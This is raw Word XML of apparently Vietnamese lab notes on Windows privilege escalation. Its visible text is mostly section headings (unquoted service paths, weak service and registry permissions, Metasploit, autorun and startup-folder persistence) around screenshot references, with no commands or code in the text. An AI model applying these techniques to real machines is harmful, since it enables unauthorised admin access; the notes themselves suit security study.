      <w:r w:rsidRPr="008404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FD0A1F" wp14:editId="5C7A2DC3">
            <wp:extent cx="4810796" cy="2362530"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="53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A3D0" w14:textId="00E1EFBF" w:rsidR="00840484" w:rsidRDefault="00840484" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008404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6AD228" wp14:editId="6F0A801E">
            <wp:extent cx="5943600" cy="3310890"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"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14C7" w14:textId="3A6EB536" w:rsidR="00840484" w:rsidRDefault="00840484" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008404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F2782C" wp14:editId="6FF8E4CE">
            <wp:extent cx="3591426" cy="857370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="55" name="Picture 5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 scree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B48E" w14:textId="33B4F281" w:rsidR="00840484" w:rsidRDefault="00840484" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008404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C801ED" wp14:editId="26240559">
            <wp:extent cx="5943600" cy="5888355"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="56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4CBB" w14:textId="1A3D2972" w:rsidR="00D040D9" w:rsidRDefault="00D040D9" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="376BC3FF" w14:textId="3C4ACF59" w:rsidR="002B507D" w:rsidRDefault="002B507D" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D016EA3" w14:textId="5AFE2CDE" w:rsidR="002B507D" w:rsidRDefault="002B507D" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="640C2FB1" w14:textId="428E7A7C" w:rsidR="002B507D" w:rsidRDefault="002B507D" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EFDB113" w14:textId="157F116D" w:rsidR="002B507D" w:rsidRDefault="002B507D" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46CC4F40" w14:textId="27091D1F" w:rsidR="002B507D" w:rsidRDefault="002B507D" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23AF040F" w14:textId="0C3B661B" w:rsidR="002B507D" w:rsidRDefault="002B507D" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34466F12" w14:textId="003F5E46" w:rsidR="002B507D" w:rsidRDefault="002B507D" w:rsidP="002B507D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="225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2B507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highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>V. Windows Privilege Escalation: Unquoted Service Path (Đường dịch vụ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2B507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highlight w:val="yellow"/>
        </w:rPr>
        <w:t>không được trích dẫn)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D30E2DD" w14:textId="6D8B44F3" w:rsidR="00C45ADE" w:rsidRDefault="00C45ADE" w:rsidP="002B507D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="225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C45ADE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</w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65BDAF59" wp14:editId="38FCE63D">
            <wp:extent cx="3839111" cy="7144747"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="62" name="Picture 62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blue screen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1FD5" w14:textId="5CF0AE27" w:rsidR="00C45ADE" w:rsidRDefault="00C45ADE" w:rsidP="002B507D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="225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C45ADE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</w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74041085" wp14:editId="5AFAA74A">
            <wp:extent cx="4906060" cy="1352739"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="63" name="Picture 6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 shot of a computer pro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FA11" w14:textId="31EDA55F" w:rsidR="00C45ADE" w:rsidRDefault="00C45ADE" w:rsidP="002B507D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="225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C45ADE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</w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23C729F6" wp14:editId="01D05F88">
            <wp:extent cx="5943600" cy="741045"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="64" name="Picture 64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black screen with white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F380" w14:textId="3C814C89" w:rsidR="00C45ADE" w:rsidRDefault="00C45ADE" w:rsidP="002B507D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="225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C45ADE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</w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47620134" wp14:editId="340680C5">
            <wp:extent cx="5943600" cy="1422400"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="65" name="Picture 6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 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1365" w14:textId="18380F80" w:rsidR="0038109F" w:rsidRDefault="000A255F" w:rsidP="002B507D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="225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0A255F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</w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45427C62" wp14:editId="47C97FC9">
            <wp:extent cx="5943600" cy="3343910"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="66" name="Picture 6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4DEF" w14:textId="115B08C4" w:rsidR="000A255F" w:rsidRDefault="000A255F" w:rsidP="002B507D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="225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0A255F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</w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18A5EDCD" wp14:editId="0990C17A">
            <wp:extent cx="5943600" cy="3512185"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="67" name="Picture 67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computer screen shot of white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F774" w14:textId="384D4F57" w:rsidR="000A255F" w:rsidRDefault="000A255F" w:rsidP="002B507D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="225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0A255F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</w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F014552" wp14:editId="5FAE2EFB">
            <wp:extent cx="5943600" cy="4211320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="68" name="Picture 68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computer screen shot of white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95A0" w14:textId="3C1947A3" w:rsidR="000A255F" w:rsidRDefault="000A255F" w:rsidP="002B507D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="225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0A255F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</w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BB51A69" wp14:editId="530D30E3">
            <wp:extent cx="5943600" cy="2377440"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="69" name="Picture 6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screen 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0385" w14:textId="22AFF3DC" w:rsidR="000A255F" w:rsidRDefault="004650FD" w:rsidP="002B507D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="225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4650F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</w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="312FF215" wp14:editId="6D34EE89">
            <wp:extent cx="5943600" cy="1538605"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="70" name="Picture 7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 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FC96" w14:textId="56976750" w:rsidR="004650FD" w:rsidRPr="004650FD" w:rsidRDefault="004650FD" w:rsidP="002B507D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="225" w:line="240" w:lineRule="auto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4650FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09635B15" wp14:editId="43A9E123">
            <wp:extent cx="5353797" cy="1924319"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="71" name="Picture 71" descr="A computer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computer screen shot of a computer erro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C531" w14:textId="12411678" w:rsidR="002B507D" w:rsidRDefault="002B507D" w:rsidP="00500A9A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6607B74C" w14:textId="7057EE30" w:rsidR="00564DFE" w:rsidRDefault="00564DFE" w:rsidP="00500A9A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B0E3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highlight w:val="yellow"/>
        </w:rPr>
        <w:t>VI. Weak Service Permission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78599FD8" w14:textId="2BD3FAD9" w:rsidR="00564DFE" w:rsidRDefault="00595AB3" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00595A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0FE63" wp14:editId="62FBFA73">
            <wp:extent cx="5525271" cy="42868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3204" w14:textId="081C524D" w:rsidR="00AC10A1" w:rsidRDefault="00AC10A1" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC10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8E11F0" wp14:editId="02530659">
            <wp:extent cx="3905795" cy="4115374"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="76" name="Picture 7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78A9" w14:textId="132B6BF1" w:rsidR="00890198" w:rsidRDefault="00890198" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008901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D8A7A3" wp14:editId="39109C16">
            <wp:extent cx="5943600" cy="1139825"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="75" name="Picture 7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screen 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7F5E" w14:textId="22F252EB" w:rsidR="00890198" w:rsidRDefault="00890198" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008901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4F32E0" wp14:editId="235F8808">
            <wp:extent cx="5058481" cy="2800741"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="58" name="Picture 5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 scree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BF73" w14:textId="6DC5A792" w:rsidR="00890198" w:rsidRDefault="00890198" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008901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79D071" wp14:editId="4DDE8CA0">
            <wp:extent cx="5943600" cy="1430655"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="59" name="Picture 5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76E3" w14:textId="655F8D0E" w:rsidR="00890198" w:rsidRDefault="00890198" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008901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414A3F" wp14:editId="75CA1A4A">
            <wp:extent cx="3924848" cy="2276793"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="60" name="Picture 6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 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3BD0" w14:textId="68889D1C" w:rsidR="00890198" w:rsidRDefault="00890198" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008901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F0CECE" wp14:editId="493A9C3D">
            <wp:extent cx="5487166" cy="1943371"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="61" name="Picture 6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29EA" w14:textId="427CDE9D" w:rsidR="00890198" w:rsidRDefault="00890198" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008901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0B8239" wp14:editId="208FAA16">
            <wp:extent cx="5382376" cy="5725324"/>
            <wp:effectExtent l="0" t="0" r="8890" b="8890"/>
            <wp:docPr id="72" name="Picture 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17F5" w14:textId="1AA60323" w:rsidR="00890198" w:rsidRDefault="00890198" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008901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8EDE11" wp14:editId="1AE9E940">
            <wp:extent cx="5420481" cy="1028844"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="73" name="Picture 7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screen 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02BF" w14:textId="0FB9F49D" w:rsidR="00890198" w:rsidRDefault="00890198" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008901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9F4E9" wp14:editId="09659299">
            <wp:extent cx="5087060" cy="2962688"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="74" name="Picture 7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computer screen with white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26B6" w14:textId="3C359E49" w:rsidR="00595AB3" w:rsidRDefault="00595AB3" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="700617C8" w14:textId="30FE1314" w:rsidR="005076EA" w:rsidRDefault="005076EA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Using Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2EB4A5" w14:textId="30123D11" w:rsidR="005076EA" w:rsidRDefault="005076EA" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005076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F8779E" wp14:editId="0DF2A0DF">
            <wp:extent cx="5943600" cy="3929380"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="77" name="Picture 77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computer screen shot of a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58A" w14:textId="3D7CF5D0" w:rsidR="005076EA" w:rsidRDefault="005076EA" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DEEF012" w14:textId="57E8B72C" w:rsidR="00407527" w:rsidRPr="00CB0E3A" w:rsidRDefault="00407527" w:rsidP="00500A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0E3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VII. Insecure Service Permission:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8A80DA" w14:textId="07B4D1A3" w:rsidR="00407527" w:rsidRDefault="00407527" w:rsidP="00407527">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5079D26D" wp14:editId="58B7368E">
            <wp:extent cx="4373880" cy="2087880"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="78" name="Picture 7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AC0D" w14:textId="7F87D31A" w:rsidR="00407527" w:rsidRDefault="00407527" w:rsidP="00407527">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01699C88" wp14:editId="389D2456">
            <wp:extent cx="5867400" cy="2560320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="79" name="Picture 7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CD76" w14:textId="2FFBB394" w:rsidR="00407527" w:rsidRDefault="00407527" w:rsidP="00407527">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EF9A6B1" wp14:editId="034E9E7C">
            <wp:extent cx="5135880" cy="891540"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="80" name="Picture 8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50503" w14:textId="26AF0150" w:rsidR="00407527" w:rsidRDefault="00407527" w:rsidP="00407527">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16752B89" wp14:editId="7862F589">
            <wp:extent cx="2293620" cy="533400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="82" name="Picture 8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AC2C7" w14:textId="38A08667" w:rsidR="00407527" w:rsidRDefault="00407527" w:rsidP="00407527">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B0B99DE" wp14:editId="69A6A1F8">
            <wp:extent cx="5036820" cy="1379220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="81" name="Picture 8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0A0C" w14:textId="72AEBE35" w:rsidR="00407527" w:rsidRDefault="00407527" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34C3F85B" w14:textId="1CF7C0FB" w:rsidR="00CB0E3A" w:rsidRPr="003E1F95" w:rsidRDefault="00CB0E3A" w:rsidP="00500A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1F9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VIII. Weak Registry Permission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B320EB" w14:textId="6B50E145" w:rsidR="00F96583" w:rsidRDefault="00F96583" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F965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A307C8" wp14:editId="0D32A782">
            <wp:extent cx="5943600" cy="1265555"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="83" name="Picture 8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screenshot of a computer pro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F301" w14:textId="18D377B0" w:rsidR="00F96583" w:rsidRDefault="00F96583" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F965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AE7C15" wp14:editId="088CB39E">
            <wp:extent cx="5943600" cy="1449070"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="84" name="Picture 8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screen shot of a computer pro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52C3" w14:textId="56835A55" w:rsidR="00F96583" w:rsidRDefault="00F96583" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F965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BD7BE2" wp14:editId="60848230">
            <wp:extent cx="5943600" cy="3838575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="85" name="Picture 85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computer screen shot of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4221" w14:textId="2CB049CB" w:rsidR="00F96583" w:rsidRDefault="00F96583" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F965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D0E15" wp14:editId="6F1FA956">
            <wp:extent cx="5943600" cy="1897380"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="86" name="Picture 8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screen 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CCD6" w14:textId="7B81B232" w:rsidR="00F96583" w:rsidRDefault="00F96583" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F965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1ED702" wp14:editId="3F2B4EFA">
            <wp:extent cx="2657846" cy="390580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1F27" w14:textId="62DA9205" w:rsidR="00F96583" w:rsidRDefault="00F96583" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F965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ACA079" wp14:editId="7994F727">
            <wp:extent cx="5087060" cy="1286054"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="88" name="Picture 8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screen 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C31F" w14:textId="414A33F2" w:rsidR="00F96583" w:rsidRDefault="00F96583" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F965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E1E587" wp14:editId="2F2F2344">
            <wp:extent cx="2086266" cy="562053"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="89" name="Picture 89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black background with white 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9E29" w14:textId="5D3B5D2A" w:rsidR="003E1F95" w:rsidRDefault="003E1F95" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4971FF08" w14:textId="30D349A3" w:rsidR="003E1F95" w:rsidRDefault="003E1F95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X. Registry-Autorun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BCB26E" w14:textId="35BE3D23" w:rsidR="003E1F95" w:rsidRDefault="00737BB4" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00992AFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>X. Boot Logon Autostart Execution(Startup Folder)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3C423A" w14:textId="667DE6DB" w:rsidR="007A4925" w:rsidRDefault="00CA04B2" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA04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8A608E" wp14:editId="2AA71283">
            <wp:extent cx="5258534" cy="3391373"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="90" name="Picture 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5367" w14:textId="155A4348" w:rsidR="00CA04B2" w:rsidRDefault="00CA04B2" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA04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1E4CCD" wp14:editId="277A2E98">
            <wp:extent cx="5943600" cy="1248410"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="91" name="Picture 9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 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CE43" w14:textId="3B1FADF0" w:rsidR="00CA04B2" w:rsidRDefault="00CA04B2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ó thể thấy được nhóm BUIL</w:t>
      </w:r>
      <w:r w:rsidR="000802E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">TIN\Users: có quyền (F) </w:t>
      </w:r>
      <w:r w:rsidR="000802E7" w:rsidRPr="000802E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0F3"/>
      </w:r>
      <w:r w:rsidR="000802E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
